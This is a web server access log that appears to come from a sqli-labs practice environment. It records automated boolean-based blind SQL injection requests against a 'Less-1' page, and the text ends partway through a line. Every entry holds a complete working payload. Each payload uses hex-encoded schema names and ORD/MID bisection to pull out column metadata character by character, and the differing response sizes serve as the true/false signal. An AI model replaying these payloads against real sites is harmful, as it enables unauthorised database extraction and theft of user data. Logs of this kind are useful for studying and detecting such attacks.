10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),8,1))>1 AND 'Iilo'='Iilo HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),8,1))>24 AND 'Iilo'='Iilo HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),8,1))>36 AND 'Iilo'='Iilo HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),8,1))>42 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),8,1))>39 AND 'Iilo'='Iilo HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),8,1))>40 AND 'Iilo'='Iilo HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),9,1))>64 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),9,1))>32 AND 'Iilo'='Iilo HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),9,1))>48 AND 'Iilo'='Iilo HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),9,1))>56 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),9,1))>52 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),9,1))>50 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),9,1))>49 AND 'Iilo'='Iilo HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),10,1))>47 AND 'Iilo'='Iilo HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),10,1))>87 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),10,1))>67 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),10,1))>57 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),10,1))>52 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),10,1))>49 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),10,1))>48 AND 'Iilo'='Iilo HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),11,1))>47 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),11,1))>1 AND 'Iilo'='Iilo HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),11,1))>24 AND 'Iilo'='Iilo HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),11,1))>35 AND 'Iilo'='Iilo HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),11,1))>41 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),11,1))>38 AND 'Iilo'='Iilo HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name